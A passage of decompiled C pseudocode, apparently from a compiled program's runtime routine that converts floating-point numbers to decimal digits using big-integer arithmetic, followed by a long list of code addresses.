																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																				_t859 = _t848 + 1 + _t1215;
																				__eflags = _t859;
																				_v1864 = _t859;
																				_t848 = _v1888;
																			}
																			_t854 =  *(_v1908 + _t848 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
																			asm("adc edx, 0x0");
																			_t848 = _v1888 + 1;
																			_t1058 = _t1058 + 1;
																			_v1888 = _t848;
																			_t1166 = _t854 * _v1896 >> 0x20;
																			_t1115 = _v1864;
																			__eflags = _t848 - _v1892;
																			if(_t848 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1166;
																				if(_t1166 == 0) {
																					goto L240;
																				}
																				__eflags = _t1058 - 0x73;
																				if(_t1058 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1058 - _t1115;
																					if(_t1058 == _t1115) {
																						_t558 = _t1235 + _t1058 * 4 - 0x740;
																						 *_t558 =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1058 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t852 = _t1166;
																					_t1166 = 0;
																					 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t852;
																					_t1115 = _v1864;
																					asm("adc edi, edi");
																					_t1058 = _t1058 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1215 - _t1115;
																	if(_t1215 == _t1115) {
																		 *(_t1235 + _t1215 * 4 - 0x740) =  *(_t1235 + _t1215 * 4 - 0x740) & _t847;
																		_t526 = _t1215 + 1; // 0x1
																		_t1115 = _t526;
																		_v1864 = _t1115;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1215 = _t1215 + 1;
																__eflags = _t1215 - _t1057;
															} while (_t1215 != _t1057);
															goto L243;
														}
													} else {
														_t1167 = _v468;
														_push(_t1057 << 2);
														_v472 = _t1057;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														__eflags = _t1167;
														if(_t1167 == 0) {
															goto L203;
														} else {
															__eflags = _t1167 - 1;
															if(_t1167 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1059 = 0;
																	_v1896 = _v472;
																	_t1216 = 0;
																	__eflags = 0;
																	do {
																		_t867 = _t1167;
																		_t1116 = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) >> 0x20;
																		 *(_t1235 + _t1216 * 4 - 0x1d0) = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) + _t1059;
																		asm("adc edx, 0x0");
																		_t1216 = _t1216 + 1;
																		_t1059 = _t1116;
																		__eflags = _t1216 - _v1896;
																	} while (_t1216 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1168 = _v1396;
													__eflags = _t1168;
													if(_t1168 != 0) {
														__eflags = _t1168 - 1;
														if(_t1168 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1060 = 0;
																_v1896 = _v472;
																_t1217 = 0;
																__eflags = 0;
																do {
																	_t872 = _t1168;
																	_t1117 = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) >> 0x20;
																	 *(_t1235 + _t1217 * 4 - 0x1d0) = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) + _t1060;
																	asm("adc edx, 0x0");
																	_t1217 = _t1217 + 1;
																	_t1060 = _t1117;
																	__eflags = _t1217 - _v1896;
																} while (_t1217 != _v1896);
																L208:
																__eflags = _t1059;
																if(_t1059 == 0) {
																	goto L245;
																} else {
																	_t870 = _v472;
																	__eflags = _t870 - 0x73;
																	if(_t870 >= 0x73) {
																		L258:
																		_push(0);
																		_v2408 = 0;
																		_v472 = 0;
																		_push( &_v2404);
																		_push(_t1025);
																		_push( &_v468);
																		L313();
																		_t1241 =  &(_t1241[4]);
																		_t843 = 0;
																	} else {
																		 *(_t1235 + _t870 * 4 - 0x1d0) = _t1059;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t841 =  &_v2404;
														L244:
														_push(_t841);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														L245:
														_t843 = 1;
													}
												}
												L246:
												__eflags = _t843;
												if(_t843 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t823 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t784 = _v1880 - _v1872;
												__eflags = _t784;
												_v1880 = _t784;
											} while (_t784 != 0);
											_t1044 = _v1884;
											goto L249;
										}
									} else {
										_t875 = _t782 / _t1043;
										_v1908 = _t875;
										_t1061 = _t782 % _t1043;
										_v1896 = _t1061;
										__eflags = _t875;
										if(_t875 == 0) {
											L184:
											__eflags = _t1061;
											if(_t1061 != 0) {
												_t1169 =  *(0xd81dbc + _t1061 * 4);
												__eflags = _t1169;
												if(_t1169 != 0) {
													__eflags = _t1169 - 1;
													if(_t1169 != 1) {
														_t876 = _v936;
														_v1896 = _t876;
														__eflags = _t876;
														if(_t876 != 0) {
															_t1218 = 0;
															_t1062 = 0;
															__eflags = 0;
															do {
																_t877 = _t1169;
																_t1121 = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) >> 0x20;
																 *(_t1235 + _t1062 * 4 - 0x3a0) = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) + _t1218;
																asm("adc edx, 0x0");
																_t1062 = _t1062 + 1;
																_t1218 = _t1121;
																__eflags = _t1062 - _v1896;
															} while (_t1062 != _v1896);
															__eflags = _t1218;
															if(_t1218 != 0) {
																_t880 = _v936;
																__eflags = _t880 - 0x73;
																if(_t880 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1235 + _t880 * 4 - 0x3a0) = _t1218;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t875 - 0x26;
												if(_t875 > 0x26) {
													_t875 = 0x26;
												}
												_t1063 =  *(0xd81d26 + _t875 * 4) & 0x000000ff;
												_v1888 = _t875;
												_v1400 = ( *(0xd81d26 + _t875 * 4) & 0x000000ff) + ( *(0xd81d27 + _t875 * 4) & 0x000000ff);
												E00D6D520(_t1063 << 2,  &_v1396, 0, _t1063 << 2);
												_t893 = E00D7DAE0( &(( &_v1396)[_t1063]), 0xd81420 + ( *(0xd81d24 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xd81d27 + _t875 * 4) & 0x000000ff) << 2);
												_t1064 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1064;
												__eflags = _t1064 - 1;
												if(_t1064 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1064 - _v936;
														_t1172 =  &_v1396;
														_t894 = _t893 & 0xffffff00 | _t1064 - _v936 > 0x00000000;
														__eflags = _t894;
														if(_t894 != 0) {
															_t1122 =  &_v932;
														} else {
															_t1172 =  &_v932;
															_t1122 =  &_v1396;
														}
														_v1876 = _t1122;
														__eflags = _t894;
														if(_t894 == 0) {
															_t1064 = _v936;
														}
														_v1880 = _t1064;
														__eflags = _t894;
														if(_t894 != 0) {
															_v1892 = _v936;
														}
														_t1123 = 0;
														_t1220 = 0;
														_v1864 = 0;
														__eflags = _t1064;
														if(_t1064 == 0) {
															L177:
															_v936 = _t1123;
															_t896 = _t1123 << 2;
															__eflags = _t896;
															goto L178;
														} else {
															_t1173 = _t1172 -  &_v1860;
															__eflags = _t1173;
															_v1928 = _t1173;
															do {
																_t903 =  *(_t1235 + _t1173 + _t1220 * 4 - 0x740);
																_v1884 = _t903;
																__eflags = _t903;
																if(_t903 != 0) {
																	_t904 = 0;
																	_t1174 = 0;
																	_t1065 = _t1220;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1065 - 0x73;
																		if(_t1065 == 0x73) {
																			goto L187;
																		} else {
																			_t1173 = _v1928;
																			_t1064 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1065 - 0x73;
																			if(_t1065 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1065 - _t1123;
																			if(_t1065 == _t1123) {
																				 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
																				_t915 = _t904 + 1 + _t1220;
																				__eflags = _t915;
																				_v1864 = _t915;
																				_t904 = _v1872;
																			}
																			_t910 =  *(_v1876 + _t904 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t910 * _v1884 + _t1174;
																			asm("adc edx, 0x0");
																			_t904 = _v1872 + 1;
																			_t1065 = _t1065 + 1;
																			_v1872 = _t904;
																			_t1174 = _t910 * _v1884 >> 0x20;
																			_t1123 = _v1864;
																			__eflags = _t904 - _v1892;
																			if(_t904 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1174;
																				if(_t1174 == 0) {
																					goto L174;
																				}
																				__eflags = _t1065 - 0x73;
																				if(_t1065 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t906 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1065 - _t1123;
																					if(_t1065 == _t1123) {
																						_t370 = _t1235 + _t1065 * 4 - 0x740;
																						 *_t370 =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1065 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t908 = _t1174;
																					_t1174 = 0;
																					 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t908;
																					_t1123 = _v1864;
																					asm("adc edi, edi");
																					_t1065 = _t1065 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1220 - _t1123;
																	if(_t1220 == _t1123) {
																		 *(_t1235 + _t1220 * 4 - 0x740) =  *(_t1235 + _t1220 * 4 - 0x740) & _t903;
																		_t338 = _t1220 + 1; // 0x1
																		_t1123 = _t338;
																		_v1864 = _t1123;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1220 = _t1220 + 1;
																__eflags = _t1220 - _t1064;
															} while (_t1220 != _t1064);
															goto L177;
														}
													} else {
														_t1175 = _v932;
														_push(_t1064 << 2);
														_v936 = _t1064;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v932);
														L313();
														_t1241 =  &(_t1241[4]);
														__eflags = _t1175;
														if(_t1175 != 0) {
															__eflags = _t1175 - 1;
															if(_t1175 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1066 = 0;
																	_v1884 = _v936;
																	_t1221 = 0;
																	__eflags = 0;
																	do {
																		_t922 = _t1175;
																		_t1124 = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) >> 0x20;
																		 *(_t1235 + _t1221 * 4 - 0x3a0) = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) + _t1066;
																		asm("adc edx, 0x0");
																		_t1221 = _t1221 + 1;
																		_t1066 = _t1124;
																		__eflags = _t1221 - _v1884;
																	} while (_t1221 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t897 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1176 = _v1396;
													__eflags = _t1176;
													if(_t1176 != 0) {
														__eflags = _t1176 - 1;
														if(_t1176 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1067 = 0;
																_v1884 = _v936;
																_t1222 = 0;
																__eflags = 0;
																do {
																	_t929 = _t1176;
																	_t1125 = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) >> 0x20;
																	 *(_t1235 + _t1222 * 4 - 0x3a0) = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) + _t1067;
																	asm("adc edx, 0x0");
																	_t1222 = _t1222 + 1;
																	_t1067 = _t1125;
																	__eflags = _t1222 - _v1884;
																} while (_t1222 != _v1884);
																L149:
																__eflags = _t1066;
																if(_t1066 == 0) {
																	goto L180;
																} else {
																	_t925 = _v936;
																	__eflags = _t925 - 0x73;
																	if(_t925 < 0x73) {
																		 *(_t1235 + _t925 * 4 - 0x3a0) = _t1066;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t906 =  &_v1396;
																		L188:
																		_push(_t906);
																		_push(_t1025);
																		_push( &_v932);
																		L313();
																		_t1241 =  &(_t1241[4]);
																		_t899 = 0;
																	}
																}
															}
														}
													} else {
														_t896 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t896);
														_t897 =  &_v1860;
														L179:
														_push(_t897);
														_push(_t1025);
														_push( &_v932);
														L313();
														_t1241 =  &(_t1241[4]);
														L180:
														_t899 = 1;
													}
												}
												L181:
												__eflags = _t899;
												if(_t899 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t823 =  &_v932;
													L262:
													_push(_t1025);
													_push(_t823);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t875 = _v1908 - _v1888;
												__eflags = _t875;
												_v1908 = _t875;
											} while (_t875 != 0);
											_t1061 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1156 = _v1920;
									_t1208 = _t1156;
									_t1045 = _v472;
									_v1872 = _t1208;
									__eflags = _t1045;
									if(_t1045 != 0) {
										_t1212 = 0;
										_t1160 = 0;
										__eflags = 0;
										do {
											_t813 =  *(_t1235 + _t1160 * 4 - 0x1d0);
											_t1111 = 0xa;
											_t1112 = _t813 * _t1111 >> 0x20;
											 *(_t1235 + _t1160 * 4 - 0x1d0) = _t813 * _t1111 + _t1212;
											asm("adc edx, 0x0");
											_t1160 = _t1160 + 1;
											_t1212 = _t1112;
											__eflags = _t1160 - _t1045;
										} while (_t1160 != _t1045);
										_v1896 = _t1212;
										__eflags = _t1212;
										_t1208 = _v1872;
										if(_t1212 != 0) {
											_t1054 = _v472;
											__eflags = _t1054 - 0x73;
											if(_t1054 >= 0x73) {
												__eflags = 0;
												_push(0);
												_v2408 = 0;
												_v472 = 0;
												_push( &_v2404);
												_push(_t1025);
												_push( &_v468);
												L313();
												_t1241 =  &(_t1241[4]);
											} else {
												 *(_t1235 + _t1054 * 4 - 0x1d0) = _t1112;
												_v472 = _v472 + 1;
											}
										}
										_t1156 = _t1208;
									}
									_t787 = E00D793F0( &_v472,  &_v936);
									_t1104 = 0xa;
									__eflags = _t787 - _t1104;
									if(_t787 != _t1104) {
										__eflags = _t787;
										if(_t787 != 0) {
											_t788 = _t787 + 0x30;
											__eflags = _t788;
											_t1208 = _t1156 + 1;
											 *_t1156 = _t788;
											_v1872 = _t1208;
											goto L282;
										} else {
											_t789 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1208 = _t1156 + 1;
										_t805 = _v936;
										 *_t1156 = 0x31;
										_v1872 = _t1208;
										__eflags = _t805;
										if(_t805 != 0) {
											_t1159 = 0;
											_t1211 = _t805;
											_t1053 = 0;
											__eflags = 0;
											do {
												_t806 =  *(_t1235 + _t1053 * 4 - 0x3a0);
												 *(_t1235 + _t1053 * 4 - 0x3a0) = _t806 * _t1104 + _t1159;
												asm("adc edx, 0x0");
												_t1053 = _t1053 + 1;
												_t1159 = _t806 * _t1104 >> 0x20;
												_t1104 = 0xa;
												__eflags = _t1053 - _t1211;
											} while (_t1053 != _t1211);
											_t1208 = _v1872;
											__eflags = _t1159;
											if(_t1159 != 0) {
												_t809 = _v936;
												__eflags = _t809 - 0x73;
												if(_t809 >= 0x73) {
													_push(0);
													_v2408 = 0;
													_v936 = 0;
													_push( &_v2404);
													_push(_t1025);
													_push( &_v932);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													 *(_t1235 + _t809 * 4 - 0x3a0) = _t1159;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t789 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t789;
									_t1031 = _v1916;
									__eflags = _t789;
									if(_t789 >= 0) {
										__eflags = _t1031 - 0x7fffffff;
										if(_t1031 <= 0x7fffffff) {
											_t1031 = _t1031 + _t789;
											__eflags = _t1031;
										}
									}
									_t791 = _a24 - 1;
									__eflags = _t791 - _t1031;
									if(_t791 >= _t1031) {
										_t791 = _t1031;
									}
									_t792 = _t791 + _v1920;
									_v1916 = _t792;
									__eflags = _t1208 - _t792;
									if(__eflags != 0) {
										while(1) {
											_t793 = _v472;
											__eflags = _t793;
											if(__eflags == 0) {
												goto L303;
											}
											_t1157 = 0;
											_t1209 = _t793;
											_t1049 = 0;
											__eflags = 0;
											do {
												_t794 =  *(_t1235 + _t1049 * 4 - 0x1d0);
												 *(_t1235 + _t1049 * 4 - 0x1d0) = _t794 * 0x3b9aca00 + _t1157;
												asm("adc edx, 0x0");
												_t1049 = _t1049 + 1;
												_t1157 = _t794 * 0x3b9aca00 >> 0x20;
												__eflags = _t1049 - _t1209;
											} while (_t1049 != _t1209);
											_t1210 = _v1872;
											__eflags = _t1157;
											if(_t1157 != 0) {
												_t800 = _v472;
												__eflags = _t800 - 0x73;
												if(_t800 >= 0x73) {
													__eflags = 0;
													_push(0);
													_v2408 = 0;
													_v472 = 0;
													_push( &_v2404);
													_push(_t1025);
													_push( &_v468);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													 *(_t1235 + _t800 * 4 - 0x1d0) = _t1157;
													_v472 = _v472 + 1;
												}
											}
											_t799 = E00D793F0( &_v472,  &_v936);
											_t1158 = 8;
											_t1031 = _v1916 - _t1210;
											__eflags = _t1031;
											do {
												_t708 = _t799 % _v1912;
												_t799 = _t799 / _v1912;
												_t1109 = _t708 + 0x30;
												__eflags = _t1031 - _t1158;
												if(_t1031 >= _t1158) {
													 *((char*)(_t1158 + _t1210)) = _t1109;
												}
												_t1158 = _t1158 - 1;
												__eflags = _t1158 - 0xffffffff;
											} while (_t1158 != 0xffffffff);
											__eflags = _t1031 - 9;
											if(_t1031 > 9) {
												_t1031 = 9;
											}
											_t1208 = _t1210 + _t1031;
											_v1872 = _t1208;
											__eflags = _t1208 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1208 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1031 = _t1196 & 0x000fffff;
					if((_t1146 | _t1196 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0xd81de4);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1016);
						if(E00D7176B() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00D70296();
							asm("int3");
							_push(_t1235);
							_push(_t1196);
							_t1197 = _v2424;
							__eflags = _t1197;
							if(_t1197 != 0) {
								_t740 = _v0;
								__eflags = _t740;
								if(_t740 != 0) {
									_push(_t1146);
									_t1147 = _a8;
									__eflags = _t1147;
									if(_t1147 == 0) {
										L320:
										E00D6D520(_t1147, _t740, 0, _a4);
										__eflags = _t1147;
										if(_t1147 != 0) {
											__eflags = _a4 - _t1197;
											if(_a4 >= _t1197) {
												_t742 = 0x16;
											} else {
												_t743 = E00D72122();
												_push(0x22);
												goto L324;
											}
										} else {
											_t743 = E00D72122();
											_push(0x16);
											L324:
											_pop(_t1199);
											 *_t743 = _t1199;
											E00D70269();
											_t742 = _t1199;
										}
									} else {
										__eflags = _a4 - _t1197;
										if(_a4 < _t1197) {
											goto L320;
										} else {
											E00D7DAE0(_t740, _t1147, _t1197);
											_t742 = 0;
										}
									}
								} else {
									_t746 = E00D72122();
									_t1200 = 0x16;
									 *_t746 = _t1200;
									E00D70269();
									_t742 = _t1200;
								}
							} else {
								_t742 = 0;
							}
							return _t742;
						} else {
							L309:
							_t1248 = _v1936;
							if(_v1936 != 0) {
								E00D7B681(_t1031, _t1248,  &_v1944);
							}
							return E00D6ABE4(_v8 ^ _t1235);
						}
					}
				}
			}

































































































































































































































































    0x00d798a9
    0x00d798b0
    0x00d798b4
    0x00d798bf
    0x00d798c2
    0x00d798c8
    0x00d798ce
    0x00d798d3
    0x00d798e2
    0x00d798e4
    0x00d798e6
    0x00d798e6
    0x00d798ed
    0x00d798f7
    0x00d798fc
    0x00d798ff
    0x00d79923
    0x00d79927
    0x00d7992c
    0x00d7992d
    0x00d7992f
    0x00d79931
    0x00d79937
    0x00d79937
    0x00d7993e
    0x00d7993e
    0x00d79941
    0x00d7abf1
    0x00000000
    0x00d79947
    0x00d79947
    0x00d79947
    0x00d7994a
    0x00d7abea
    0x00000000
    0x00d79950
    0x00d79950
    0x00d79950
    0x00d79953
    0x00d7abe3
    0x00000000
    0x00d79959
    0x00d79959
    0x00d7995c
    0x00d7abdc
    0x00000000
    0x00d79962
    0x00d7996b
    0x00d79973
    0x00d79976
    0x00d79979
    0x00d7997c
    0x00d79982
    0x00d7998a
    0x00d79990
    0x00d7999a
    0x00d7999a
    0x00d7999d
    0x00d799a5
    0x00d799ac
    0x00d799ac
    0x00d7999f
    0x00d7999f
    0x00d799a1
    0x00d799b4
    0x00d799ba
    0x00d799bc
    0x00d799c0
    0x00d799c5
    0x00d799d2
    0x00d799d4
    0x00d799da
    0x00d799df
    0x00d799e0
    0x00d799e1
    0x00d799eb
    0x00d799f0
    0x00d799f6
    0x00d799fb
    0x00d79a04
    0x00d79a04
    0x00d79a06
    0x00d799fd
    0x00d799fd
    0x00d79a02
    0x00000000
    0x00000000
    0x00d79a02
    0x00d79a0c
    0x00d79a14
    0x00d79a16
    0x00d79a1f
    0x00d79a20
    0x00d79a26
    0x00d79a28
    0x00d79e1b
    0x00d79e21
    0x00d79f40
    0x00d79f40
    0x00d79f47
    0x00d79f47
    0x00d79f47
    0x00d79f4e
    0x00d79f51
    0x00d79f58
    0x00d79f58
    0x00d79f53
    0x00d79f53
    0x00d79f53
    0x00d79f5c
    0x00d79f5d
    0x00d79f5f
    0x00d79f62
    0x00d79f65
    0x00d79f68
    0x00d79f6e
    0x00d79f71
    0x00d79f74
    0x00d79f7e
    0x00d79f7e
    0x00d79f7e
    0x00d79f76
    0x00d79f76
    0x00d79f78
    0x00000000
    0x00d79f7a
    0x00d79f7a
    0x00d79f7a
    0x00d79f78
    0x00d79f80
    0x00d79f82
    0x00d7a023
    0x00d7a023
    0x00d7a030
    0x00d7a030
    0x00d7a030
    0x00d7a037
    0x00d7a039
    0x00d7a040
    0x00d7a045
    0x00d7a046
    0x00d7a04b
    0x00d79f88
    0x00d79f88
    0x00d79f8a
    0x00000000
    0x00d79f90
    0x00d79f92
    0x00d79f93
    0x00d79f95
    0x00d79f97
    0x00d79f97
    0x00d79f99
    0x00d79f9c
    0x00d79fa4
    0x00d79fa6
    0x00d79fa9
    0x00d79faf
    0x00d79faf
    0x00d79fb1
    0x00d79fbd
    0x00d79fbd
    0x00d79fbd
    0x00d79fb3
    0x00d79fb5
    0x00d79fb5
    0x00d79fc4
    0x00d79fc7
    0x00d79fc9
    0x00d79fd0
    0x00d79fd0
    0x00d79fcb
    0x00d79fcb
    0x00d79fcb
    0x00d79fd8
    0x00d79fe2
    0x00d79fe8
    0x00d79fe9
    0x00d79fee
    0x00d79ff4
    0x00d79ff7
    0x00000000
    0x00000000
    0x00d79ff9
    0x00d79ff9
    0x00d7a001
    0x00d7a001
    0x00d7a007
    0x00d7a00e
    0x00d7a01b
    0x00d7a010
    0x00d7a010
    0x00d7a013
    0x00d7a013
    0x00d7a00e
    0x00d79f8a
    0x00d7a057
    0x00d7a067
    0x00d7a074
    0x00d7a076
    0x00d7a07d
    0x00d79e27
    0x00d79e27
    0x00d79e30
    0x00d79e31
    0x00d79e3b
    0x00d79e41
    0x00d79e43
    0x00d79e49
    0x00d79e49
    0x00d79e4b
    0x00d79e4b
    0x00d79e52
    0x00d79e59
    0x00000000
    0x00000000
    0x00d79e5f
    0x00d79e62
    0x00d79e65
    0x00000000
    0x00d79e67
    0x00d79e67
    0x00d79e67
    0x00d79e67
    0x00d79e6e
    0x00d79e71
    0x00d79e78
    0x00d79e78
    0x00d79e73
    0x00d79e73
    0x00d79e73
    0x00d79e7c
    0x00d79e7f
    0x00d79e81
    0x00d79e83
    0x00d79e89
    0x00d79e8f
    0x00d79e91
    0x00d79e91
    0x00d79e91
    0x00d79e98
    0x00d79e98
    0x00d79e9a
    0x00d79ea6
    0x00d79ea6
    0x00d79ea6
    0x00d79e9c
    0x00d79e9e
    0x00d79e9e
    0x00d79ead
    0x00d79eb0
    0x00d79eb2
    0x00d79eb9
    0x00d79eb9
    0x00d79eb4
    0x00d79eb4
    0x00d79eb4
    0x00d79ec1
    0x00d79ecc
    0x00d79ed2
    0x00d79ed3
    0x00d79ed8
    0x00d79ede
    0x00d79ee1
    0x00000000
    0x00000000
    0x00d79ee3
    0x00d79ee3
    0x00d79eed
    0x00d79ef8
    0x00d79f00
    0x00d79f06
    0x00d79f11
    0x00d79f17
    0x00d79f1e
    0x00d79f31
    0x00d79f38
    0x00d79f38
    0x00000000
    0x00d79e65
    0x00d79e4b
    0x00000000
    0x00d79e43
    0x00d7a080
    0x00d7a080
    0x00d7a086
    0x00d7a08b
    0x00d7a091
    0x00d7a091
    0x00d7a094
    0x00d7a09b
    0x00d7a0a2
    0x00d7a0a3
    0x00d7a0a4
    0x00d7a0a9
    0x00d79a2e
    0x00d79a2e
    0x00d79a37
    0x00d79a38
    0x00d79a42
    0x00d79a48
    0x00d79a4a
    0x00d79c50
    0x00d79c58
    0x00d79c5b
    0x00d79c60
    0x00d79c63
    0x00d79c6b
    0x00d79c6f
    0x00d79c75
    0x00d79c7b
    0x00d79c80
    0x00d79c87
    0x00d79c88
    0x00d79c88
    0x00d79c88
    0x00d79c8f
    0x00d79c92
    0x00d79c9a
    0x00d79ca0
    0x00d79ca5
    0x00d79ca5
    0x00d79ca2
    0x00d79ca2
    0x00d79ca2
    0x00d79ca9
    0x00d79caa
    0x00d79cac
    0x00d79caf
    0x00d79cb5
    0x00d79cbb
    0x00d79cbe
    0x00d79cc1
    0x00d79cc7
    0x00d79cca
    0x00d79ccd
    0x00d79cd7
    0x00d79cd7
    0x00d79cd7
    0x00d79ccf
    0x00d79ccf
    0x00d79cd1
    0x00000000
    0x00d79cd3
    0x00d79cd3
    0x00d79cd3
    0x00d79cd1
    0x00d79cd9
    0x00d79cdb
    0x00d79dcd
    0x00d79dcd
    0x00d79dcf
    0x00d79dd4
    0x00d79dd5
    0x00d79ddb
    0x00d79de7
    0x00d79dee
    0x00d79def
    0x00d79df0
    0x00d79df5
    0x00d79ce1
    0x00d79ce1
    0x00d79ce3
    0x00000000
    0x00d79ce9
    0x00d79ceb
    0x00d79cec
    0x00d79cee
    0x00d79cf0
    0x00d79cf2
    0x00d79cf2
    0x00d79cf8
    0x00d79cfa
    0x00d79d00
    0x00d79d03
    0x00d79d11
    0x00d79d17
    0x00d79d17
    0x00d79d19
    0x00d79d1c
    0x00d79d22
    0x00d79d22
    0x00d79d24
    0x00000000
    0x00000000
    0x00d79d26
    0x00d79d28
    0x00d79d2e
    0x00d79d2e
    0x00d79d2a
    0x00d79d2a
    0x00d79d2a
    0x00d79d33
    0x00d79d35
    0x00d79d3c
    0x00d79d3c
    0x00d79d37
    0x00d79d37
    0x00d79d37
    0x00d79d62
    0x00d79d68
    0x00d79d6b
    0x00d79d71
    0x00d79d78
    0x00d79d79
    0x00d79d7a
    0x00d79d80
    0x00d79d83
    0x00d79d85
    0x00000000
    0x00d79d85
    0x00000000
    0x00d79d83
    0x00d79d8d
    0x00d79d93
    0x00d79d9b
    0x00d79d9b
    0x00d79d9c
    0x00d79d9e
    0x00d79da2
    0x00d79daa
    0x00d79daa
    0x00d79daa
    0x00d79dac
    0x00d79db3
    0x00d79db8
    0x00d79dc5
    0x00d79dba
    0x00d79dbd
    0x00d79dbd
    0x00d79db8
    0x00d79ce3
    0x00d79df8
    0x00d79e02
    0x00d79e08
    0x00d79e0e
    0x00d79e14
    0x00d79a50
    0x00d79a50
    0x00d79a50
    0x00d79a52
    0x00d79a59
    0x00d79a60
    0x00000000
    0x00000000
    0x00d79a66
    0x00d79a69
    0x00d79a6c
    0x00000000
    0x00d79a6e
    0x00d79a76
    0x00d79a7b
    0x00d79a80
    0x00d79a81
    0x00d79a83
    0x00d79a8b
    0x00d79a8f
    0x00d79a95
    0x00d79a9b
    0x00d79aa0
    0x00d79aa7
    0x00d79aa7
    0x00d79aa8
    0x00d79aab
    0x00d79ab3
    0x00d79ab9
    0x00d79abe
    0x00d79abe
    0x00d79abb
    0x00d79abb
    0x00d79abb
    0x00d79ac2
    0x00d79ac3
    0x00d79ac5
